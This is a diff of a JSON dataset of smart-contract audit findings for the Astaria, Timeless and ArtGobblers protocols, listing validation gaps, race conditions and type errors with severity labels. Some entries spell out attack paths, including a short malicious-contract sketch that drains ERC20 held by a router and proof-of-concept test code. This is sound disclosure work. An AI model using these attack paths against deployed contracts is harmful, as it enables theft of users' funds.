"https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _appendStack, we have the following block: newStack = new Stack[](stack.length + 1); newStack[stack.length] = newSlot; uint256 potentialDebt = _getOwed(newSlot, newSlot.point.end); ... if ( stack.length > 0 && potentialDebt > newSlot.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Note, we are only performing a comparison between newSlot.lien.details.maxPotentialDebt and potentialDebt when stack.length > 0. If _createLien is called with params.stack.length == 0, we would not perform this check and thus the input params are not fully checked for misconfiguration.", "labels": [ "Spearbit", - "Timeless", - "Severity: Low Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Factory.sol owner can change fees unexpectedly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The Factory.sol owner may be able to front run yield calculations in a gate implementation and change user fees unexpectedly.", + "title": "Previous withdraw proxy's withdrawReserveReceived is not updated when assets are drained from the current withdraw proxy to the previous", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When drain is called, we don't update the s.epochData[s.currentEpoch - 1]'s withdrawReserveReceived; this is in contrast to when withdraw reserves are transferred from the public vault to the withdraw proxy. 
This would unlink the previous withdraw proxy's withdrawReserveReceived storage parameter from the total amount of assets it has received from either the public vault or the current withdraw proxy. An actor can manipulate the value of B_{n-1} - W_{n-1} by sending assets to the public vault and the current withdraw proxy before calling transferWithdrawReserve (B_{n-1} is the previous withdraw proxy's asset balance, W_{n-1} is the previous withdraw proxy's withdrawReserveReceived and n is the public vault's epoch). B_{n-1} - W_{n-1} should really represent the sum of all near-boundary auction payments the previous withdraw proxy receives plus any assets that are transferred to it by an external actor. Related Issue 46.", "labels": [ "Spearbit", - "Timeless", - "Severity: Low Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Low uniswapV3TwapSecondsAgo may result in AMM manipulation in pound()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The lower the value of uniswapV3TwapSecondsAgo is set with at construction creation time the easier It becomes easier for attackers to it becomes for an attacker to manipulate the results of the pound() function. manipulate automated market maker price feeds with a lower time horizon, requiring less capital to manipulate prices, although users may simply not use an xPYT contract that sets uniswapV3TwapSecondsAgo too low.", + "title": "Update solc version and use unchecked in Uniswap related libraries", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted libraries above are referenced from the Uniswap codebase, which is intended to work with Solidity compiler <0.8. These older versions have unchecked arithmetic by default and the code takes it into account. Astaria code is intended to work with Solidity compiler >=0.8, which doesn't have unchecked arithmetic by default. Hence, to port the code, it has to be turned on via the unchecked keyword. For example, FullMathUniswap.mulDiv(type(uint).max, type(uint).max, type(uint).max) reverts for v0.8, and returns type(uint).max for older versions.", "labels": [ "Spearbit", - "Timeless", - "Severity: Low Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "UniswapV3Swapper uses wrong allowance check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Before the UniswapV3Swapper can exit a gate, it needs to set an XPYT allowance to the gate. The following check determines if an approval needs to be set: if ( args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut ) { args.xPYT.safeApprove(address(args.gate), type(uint256).max); } args.gate.exitToUnderlying( args.recipient, args.vault, args.xPYT, tokenAmountOut ); The tokenAmountOut is in an underlying token amount but A legitimate gate.exitToUnderlying address(swapper)) checks allowance[swapper][gate] >= previewWithdraw(tokenAmountOut). is compared against an xPYT shares amount. 
xPYT.withdraw(tokenAmountOut, address(gate), call will call", + "title": "buyoutLien is prone to race conditions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken.buyoutLien and VaultImplementation.buyoutLien are both prone to race conditions where multiple vaults can try to front-run each others' buyoutLien call to end up registering their own lien. Also note, due to the storage values s.minInterestBPS and s.minDurationIncrease being used in isValidRefinance, the winning buyoutLien call does not necessarily have to have the best rate or duration among the other candidates in the race.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Missing check that tokenIn and tokenOut are different", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The doZeroExSwap() function takes in two ERC20 addresses which are tokenIn and tokenOut. The problem is that the doZeroExSwap() function does not check if the two token addresses are different from one another. Adding this check can reduce possible attack vectors.", + "title": "ERC20-Cloned allows certain actions for address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In ERC20-Cloned, address(0) can be used as: the spender, the to parameter of transferFrom, the to parameter of transfer, the to parameter of _mint, and the from parameter of _burn. As an example, one can transfer or transferFrom to address(0), which would make that amount of tokens unusable but does not update the total supply, in contrast to if _burn was called.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Gate.sol gives unlimitted ERC20 approval on pyt for arbitrary address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "A malicious contract may be passed into the claimYieldAndEnter() function as xPYT and given full control over any PYT the contract may ever hold. Even though PYT is validated to be a real PYT contract and the Gate.sol contract isnt expected to have any PYT in it, it would be safer to remove any unnecessary approvals.", + "title": "BEACON_PROXY_IMPLEMENTATION and WETH cannot be updated for AstariaRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There is no update mechanism for BEACON_PROXY_IMPLEMENTATION and WETH in AstariaRouter. It would make sense that one would want to keep WETH not upgradable (unless we provide the wrong address to the constructor). But for BEACON_PROXY_IMPLEMENTATION there could be a genuine need to upgrade it at some point.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Constructor function does not check for zero address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The constructor function does not check if the addresses passed in are zero addresses. 
This check can guard against errors during deployment of the contract.", + "title": "Incorrect key parameter type is used for s.epochData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In PublicVault, whenever an epoch key is provided to the mapping s.epochData, its type is uint64, but the type of s.epochData is mapping(uint256 => EpochData).", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Accruing yield to msg.sender is not required when minting to xPYT contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The _exit function always accrues yield to the msg.sender before burning new tokens. The idea is to accrue yield for the recipient rst before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are burned on the Gate and not msg.sender.", + "title": "buyoutLien, canLiquidate and makePayment have different notions of expired liens when considering edge cases", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When swapping out a lien that is just expired (the lien's end t_end equals the current timestamp t_now), one can call buyoutLien to swap it out. But when t_now > t_end, buyoutLien reverts due to the underflow in _getRemainingInterest when calculating the buyout amount. This is in contrast to canLiquidate, which allows a lien with t_now = t_end to be liquidated as well. makePayment also only considers t_end < t_now as expired liens. So the expired/non-functional lien time ranges for the different endpoints are: buyoutLien: (t_end, infinity); canLiquidate: [t_end, infinity); makePayment: (t_end, infinity).", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Unlocked solidity pragmas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Most of the implementation code uses a solidity pragma of 0.8.4. contracts that use different functions. Unlocked solidity pragmas can result in unexpected behaviors or errors with different compiler versions.", + "title": "Ensure all ratios are less than 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Although numerators and denominators for different fees are set by the admin, it's good practice to add a check in the contract for absurd values. In this case, that would be when the numerator is greater than the denominator.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "No safeCast in UniswapV3Swappers _swap.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "It should be noted that solidity version 0.8.0 doesnt revert on overow when type-casting. For example, if you tried casting the value 129 from uint8 to int8, it would overow to -127 instead. 
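For the expired-lien boundary finding above, a sketch of a single shared predicate that would make buyoutLien, canLiquidate and makePayment agree on whether t_now == t_end counts as expired. The choice of >= here is illustrative; the point is that all three endpoints use the same boundary.

pragma solidity ^0.8.17;

contract LienExpirySketch {
    // One predicate used by all three endpoints pins the boundary:
    // with >=, a lien whose end equals block.timestamp is expired
    // everywhere, instead of expired for only some of the endpoints.
    function isExpired(uint256 lienEnd) public view returns (bool) {
        return block.timestamp >= lienEnd;
    }
}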
This is because signed integers have a lower positive integer range compared to unsigned integers i.e -128 to 127 for int8 versus 0 to 255 for uint8.", + "title": "Factor out s.slope updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Slope updates occur in multiple locations but do not emit events.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "One step critical address change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Setting the owner in Ownable is a one-step transaction. This situation enables the scenario of contract functionality becoming inaccessible or making it so a malicious address that was accidentally set as owner could compromise the system.", + "title": "External call to arbitrary address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Router has a convenience function to commit to multiple liens, AstariaRouter.commitToLiens. This function causes the router to receive WETH and allows the caller to supply an arbitrary vault address lienRequest.strategy.vault which is called by the router. This allows the potential for the caller to re-enter in the middle of the loop, and also allows them to drain any WETH that happens to be in the Router. In our review, no immediate reason for the Router to have WETH outside of commitToLiens calls was identified and therefore the severity of this finding is low.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Missing zero address checks in transfer and transferFrom functions.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The codebase uses solmates ERC-20 implementation. It should be noted that this library sacrices user safety for gas optimization. As a result, their ERC-20 implementation doesnt include zero address checks on transfer and transferFrom functions.", + "title": "Astaria's Seaport orders may not be listed on OpenSea", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "To list Seaport orders on OpenSea, the order should pass certain validations as described here (see OpenSea Order Validation). Currently, Astaria orders will fail this validation. For instance, zone and zoneHash values are not set as suggested.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Should add indexed keyword to deployed xPYT event", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The DeployXPYT event only has the ERC20 asset_ marked as indexed while xPYT deployed can also have the indexed key word since you can use up to three per event and it will make it easier for bots to interact off chain with the protocol.", + "title": "Any ERC20 held in the Router can be stolen using ERC4626RouterBase functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "All four functions in ERC4626RouterBase.sol take in a vault address, a to address, a shares amount, and a maxAmountIn for validation. 
The first step is to read vault.asset() and then approve the vault to spend the ERC20 at whatever address is returned for the given amount. function mint( IERC4626 vault, address to, uint256 shares, uint256 maxAmountIn ) public payable virtual override returns (uint256 amountIn) { ERC20(vault.asset()).safeApprove(address(vault), shares); if ((amountIn = vault.mint(shares, to)) > maxAmountIn) { revert MaxAmountError(); } } In the event that the Router holds any ERC20, a malicious user can design a contract with the following functions: function asset() pure returns (address) { return [ERC20 the router holds]; } function mint(uint shares, address to) pure returns (uint) { return 0; } If this contract is passed as the vault, the function will pass, and the router will approve this contract to control its holdings of the given ERC20.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Missing check that tokenAmountIn is larger than zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "In doZeroExSwap() there is no check that the tokenAmountIn number is larger than zero. Adding this check can add more thorough validation within the function.", + "title": "Inconsistency in byte size of maxInterestRate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In RouterStorage, maxInterestRate has a size of uint88. However, when being set from file(), it is capped at uint48 by the safeCastTo48() function.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "ERC20 does not emit Approval event in transferFrom", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The ERC20 contract does not emit new Approval events with the updated allowance in transferFrom. This makes it impossible to track approvals solely by looking at Approval events.", + "title": "Router#file has update for nonexistent MinInterestRate variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "One of the options in the file() function is to update FileType.MinInterestRate. There are two problems here: 1) If someone chooses this FileType, the update actually happens to s.maxInterestRate. 2) There is no minInterestRate storage variable, as minInterestBPS is handled on L235-236.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Use the ofcial UniswapV3 0.8 branch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The current repositories create local copies of UniswapV3s codebase and manually migrate the contracts to Solidity 0.8. For FullMath.sol this also leads to some small gas optimizations in this LOC as it uses 0 instead of type(uint256).max + 1.", + "title": "getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "liquidationWithdrawRatio and yIntercept, like other amount-related parameters, are of type uint88, and they are the values returned by getLiquidationWithdrawRatio() and getYIntercept() respectively. 
{ - "title": "Use the official UniswapV3 0.8 branch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The current repositories create local copies of UniswapV3's codebase and manually migrate the contracts to Solidity 0.8. For FullMath.sol this also leads to some small gas optimizations in this LOC as it uses 0 instead of type(uint256).max + 1.", + "title": "getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "liquidationWithdrawRatio and yIntercept, like other amount-related parameters, are of type uint88 and they are the values returned by getLiquidationWithdrawRatio() and getYIntercept() respectively. But the return types of getLiquidationWithdrawRatio() and getYIntercept() are defined as uint256.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "No checks that provided xPYT matches PYT of the provided vault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The Gate contract has many functions that allow specifying vault and xPYT addresses as parameters. The underlying of the xPYT address is assumed to be the same as the vault's PYT, but this check is not enforced. Users that call the Gate functions with an xPYT contract for the wrong vault could see their deposits/withdrawals lost.", + "title": "The modified implementation of redeem is omitting a check to make sure not to redeem 0 assets.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The modified implementation of redeem is omitting the check // Check for rounding error since we round down in previewRedeem. require((assets = previewRedeem(shares)) != 0, \"ZERO_ASSETS\"); You can see a trail of it in redeemFutureEpoch.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Protocol does not work with non-standard ERC20 tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Some ERC20 tokens make modifications to their transfer or balanceOf functions. One kind includes deflationary tokens that charge a fee for every transfer or transferFrom. Others are rebasing tokens that increase in balance over time. Using these tokens in the protocol can lead to issues such as: Entering a vault through the Gate will not work as it tries to deposit the pre-fee amount instead of the received post-fee amount (a balance-delta sketch follows this block). The UniswapV3Swapper tries to enter a vault with the pre-fee transfer amount.", + "title": "PublicVault's redeem and redeemFutureEpoch always return 0 assets.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "assets returned by redeem and redeemFutureEpoch will always be 0, since it has not been set in redeemFutureEpoch. Also, the Withdraw event emits an incorrect value for assets because of this. The issue stems from trying to consolidate some of the logic for redeem and withdraw by using redeemFutureEpoch for both of them.", "labels": [ "Spearbit", - "Timeless", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] },
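For the non-standard ERC20 finding above, a common mitigation is to credit only the balance delta actually received. A minimal sketch, assuming a hypothetical _pullToken helper; the names are illustrative and not from the audited codebase:

    interface IERC20Like {
        function balanceOf(address account) external view returns (uint256);
        function transferFrom(address from, address to, uint256 amount) external returns (bool);
    }

    // Credit only what actually arrived, so fee-on-transfer tokens are handled correctly.
    function _pullToken(IERC20Like token, address from, uint256 amount) internal returns (uint256 received) {
        uint256 balanceBefore = token.balanceOf(address(this));
        token.transferFrom(from, address(this), amount);
        received = token.balanceOf(address(this)) - balanceBefore; // post-fee amount
    }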
{ - "title": "The claimGobbler function does not enforce the MINTLIST_SUPPLY on-chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "There is a public constant MINTLIST_SUPPLY (2000) that is supposed to represent the number of gobblers that can be minted by using merkle proofs. However, this is not explicitly enforced in the claimGobbler function and will need to be verified off-chain from the list of merkle proof data. The risk lies in the possibility of having more than 2000 proofs.", + "title": "OWNER() cannot be updated for private or public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "owner() is immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVaultBase. That means, for example, that if there is an issue with the currently hardcoded owner(), there is no way to update it, and the liquidity/assets in the public/private vaults would also be at risk.", "labels": [ "Spearbit", - "ArtGobblers", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Feeding a gobbler to itself may lead to an infinite loop in the off-chain renderer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The contract allows feeding a gobbler to itself and while we do not think such action causes any issues on the contract side, it will nevertheless cause potential problems with the off-chain rendering for the gobblers. The project explicitly allows feeding gobblers to other gobblers. In such cases, if the off-chain renderer is designed to render the inner gobbler, it would cause an infinite loop for the self-feeding case. Additionally, when a gobbler is fed to another gobbler the user will still own one of the gobblers. However, this is not the case with self-feeding.", + "title": "ROUTER() cannot be updated for private or public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "ROUTER() is immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVaultBase. That means, for example, that if there is an issue with the currently hardcoded ROUTER(), or that it needs to be upgraded, the current public/private vaults would not be able to communicate with the new ROUTER.", "labels": [ "Spearbit", - "ArtGobblers", + "Astaria", "Severity: Low Risk" ] }, { - "title": "The function toString() does not manage memory properly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "There are two issues with the toString() function: 1. It does not manage the memory of the returned string correctly. In short, there can be overlaps between memory allocated for the returned string and the current free memory. 2. It assumes that the free memory is clean, i.e., it does not explicitly zero out used memory. Proof of concept for case 1: function testToStringOverwrite() public { string memory str = LibString.toString(1); uint freememptr; uint len; bytes32 data; uint raw_str_ptr; assembly { // Imagine a high level allocation writing something to the current free memory. // Should have sufficient higher order bits for this to be visible mstore(mload(0x40), not(0)) freememptr := mload(0x40) // Correctly allocate 32 more bytes, to avoid more interference mstore(0x40, add(mload(0x40), 32)) raw_str_ptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"memptr: \", freememptr); emit log_named_uint(\"str: \", raw_str_ptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); } Logs: memptr: : 256 str: : 205 len: : 1 data: : 0x31000000000000000000000000000000000000ffffffffffffffffffffffffff The key issue here is that the function allocates and manages memory region [205, 269) for the return variable. However, the free memory pointer is set to 256. The memory between [256, 269) can refer to both the string and another dynamic type that's allocated later on. 
Proof of concept for case 2: function testToStringDirty() public { uint freememptr; // Make the next 4 bytes of the free memory dirty assembly { let dirty := not(0) freememptr := mload(0x40) mstore(freememptr, dirty) mstore(add(freememptr, 32), dirty) mstore(add(freememptr, 64), dirty) mstore(add(freememptr, 96), dirty) mstore(add(freememptr, 128), dirty) } string memory str = LibString.toString(1); uint len; bytes32 data; assembly { freememptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"str: \", freememptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); assembly { freememptr := mload(0x40) } emit log_named_uint(\"memptr: \", freememptr); } Logs: str: 205 len: : 1 data: : 0x31ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff memptr: : 256 In both cases, high-level Solidity will not have issues decoding values, as this region in memory is meant to be empty. However, certain ABI decoders, notably Etherscan, will have trouble decoding them. Note: It is likely that the use of toString() in ArtGobblers will not be impacted by the above issues. However, these issues can become severe if LibString is used as a generic string library.", + "title": "Wrong return parameter type is used for getOwed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Both variations of getOwed use _getOwed and return uint192. But _getOwed returns a uint88.", "labels": [ "Spearbit", - "ArtGobblers", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Consider migrating all require statements to Custom Errors for gas optimization, better UX, DX and code consistency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "There is a mixed usage of both require and Custom Errors to handle cases where the transaction must revert. We suggest replacing all require instances with Custom Errors in order to save gas and improve user / developer experience (a before/after sketch follows this block). The following is a list of contract functions that still use require statements: ArtGobblers mintLegendaryGobbler, ArtGobblers safeBatchTransferFrom, ArtGobblers safeTransferFrom, SignedWadMath wadLn, GobblersERC1155B balanceOfBatch, GobblersERC1155B _mint, GobblersERC1155B _batchMint, PagesERC721 ownerOf, PagesERC721 balanceOf, PagesERC721 approve, PagesERC721 transferFrom, PagesERC721 safeTransferFrom, PagesERC721 safeTransferFrom (overloaded version)", + "title": "Document and reason about which functionalities should be frozen on protocol pause", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "On protocol pause, a few functions are allowed to be called. Some instances are noted above. There is no documentation on why these functionalities are allowed while the remaining functions are frozen.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Gas Optimization" + "Astaria", + "Severity: Low Risk" ] },
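For the Custom Errors migration suggested above, a minimal before/after sketch; the error name and owner variable are illustrative, not from the audited code:

    error Unauthorized(address caller);

    address internal owner;

    function onlyOwnerAction() external {
        // before: require(msg.sender == owner, "UNAUTHORIZED");
        if (msg.sender != owner) revert Unauthorized(msg.sender); // after: cheaper revert data, typed decoding
    }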
{ - "title": "Minting of Gobbler and Pages can be further gas optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "Currently, in order to mint a new Page or Gobbler users must have enough $GOO in their Goo contract balance. If the user does not have enough $GOO he/she must call ArtGobblers.removeGoo(amount) to remove the required amount from the Gobbler's balance and mint new $GOO. That $GOO will subsequently be burned to mint the Page or Gobbler. In the vast majority of cases users will never have $GOO in the Goo contract but will have their $GOO directly staked inside their Gobblers to compound and maximize the outcome. Given these premises, it makes sense to implement a function that does not require users to make two distinct transactions (mint $GOO via removeGoo, then burn $GOO and mint the Page/Gobbler via mintFromGoo), but rather use a single transaction that consumes the $GOO staked on the Gobbler itself without ever minting and burning any $GOO from the Goo contract. By doing so, the user will perform the mint operation with only one transaction and the gas cost will be much lower because it does not require any interaction with the Goo contract.", + "title": "Wrong parameter type is used for s.strategyValidators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "s.strategyValidators is of type mapping(uint32 => address) but the provided TYPE in the context is of type uint8.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Gas Optimization" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Declare GobblerReserve artGobblers as immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The artGobblers in the GobblerReserve can be declared as immutable to save gas. - ArtGobblers public artGobblers; + ArtGobblers public immutable artGobblers;", + "title": "Some functions do not emit events, but they should", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "AstariaRouter.sol#L268: Other filing endpoints in the same contract, and also CollateralToken and LienToken, emit FileUpdated(what, data). But fileGuardian does not (a sketch follows this block).", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Gas Optimization" + "Astaria", + "Severity: Low Risk" ] },
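For the missing-events finding above, a minimal sketch of emitting the same event as the other filing endpoints. The File field names and loop shape are assumptions based on the file() snippets that appear later in this diff:

    function fileGuardian(File[] calldata file) external {
        // ... existing guardian authorization and per-item state updates ...
        for (uint256 i; i < file.length; ) {
            emit FileUpdated(file[i].what, file[i].data); // mirror the other endpoints
            unchecked { ++i; }
        }
    }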
{ - "title": "Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "From the EIP-1155 documentation: Smart contracts implementing the ERC-1155 standard MUST implement all of the functions in the ERC1155 interface. Smart contracts implementing the ERC-1155 standard MUST implement the ERC-165 supportsInterface function and MUST return the constant value true if 0xd9b67a26 is passed through the interfaceID argument. Neither GobblersERC1155B nor ArtGobblers are actually implementing the ERC-165 supportsInterface function. Consider implementing the required ERC-165 supportsInterface function in the affected contracts.", + "title": "setNewGuardian can be changed to a 2 or 3 step transfer of authority process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The current guardian might pass a wrong _guardian parameter to setNewGuardian, which can break the upgradability of the AstariaRouter using fileGuardian (a two-step handover is sketched after this block).", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "LogisticVRGDA is importing wadExp from SignedWadMath but never uses it", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The LogisticVRGDA is importing the wadExp function from the SignedWadMath library, but it is never used.", + "title": "There are no range/value checks when some parameters get fileed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are no range/value checks when some parameters get fileed. For example: There are no hardcoded range checks for the ...Numerators and ...Denominators, so the protocol's users cannot trustlessly assume the authorized users would not push these values into ranges deemed unacceptable. When an address gets updated, we don't check whether the value provided is address(0) or not.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] - }, - { - "title": "Pages.tokenURI does not revert when pageId is the ID of an invalid or not minted token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", - "body": "The current implementation of tokenURI in Pages is returning an empty string if the pageId specified by the user's input has not been minted yet (pageId > currentId). Additionally, the function does not correctly handle the case of a special tokenId equal to 0, which is an invalid token ID given that the first mintable token would be the one with ID equal to 1. The EIP-721 documentation specifies that the contract should revert in this case: Throws if _tokenId is not a valid NFT. URIs are defined in RFC 3986.", + }, + { + "title": "Manually constructed storage slots can be chosen so that the pre-image of the hash is unknown", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the codebase, some storage slots are manually constructed using the keccak256 hash of a string xyz.astaria. .... The pre-images of these hashes are known. This could in the future allow actors to find a path to those storage slots using the keccak256 hash function in the codebase and some crafted payload.", "labels": [ "Spearbit", - "ArtGobblers", - "Severity: Informational" + "Astaria", + "Severity: Low Risk" ] },
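For the setNewGuardian finding above, a minimal two-step handover sketch; the names are hypothetical, not Astaria's implementation:

    address public guardian;
    address public pendingGuardian;

    function setNewGuardian(address _guardian) external {
        require(msg.sender == guardian);
        pendingGuardian = _guardian;      // step 1: nominate
    }

    function acceptGuardianship() external {
        require(msg.sender == pendingGuardian);
        guardian = msg.sender;            // step 2: nominee proves the address is usable
        delete pendingGuardian;
    }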
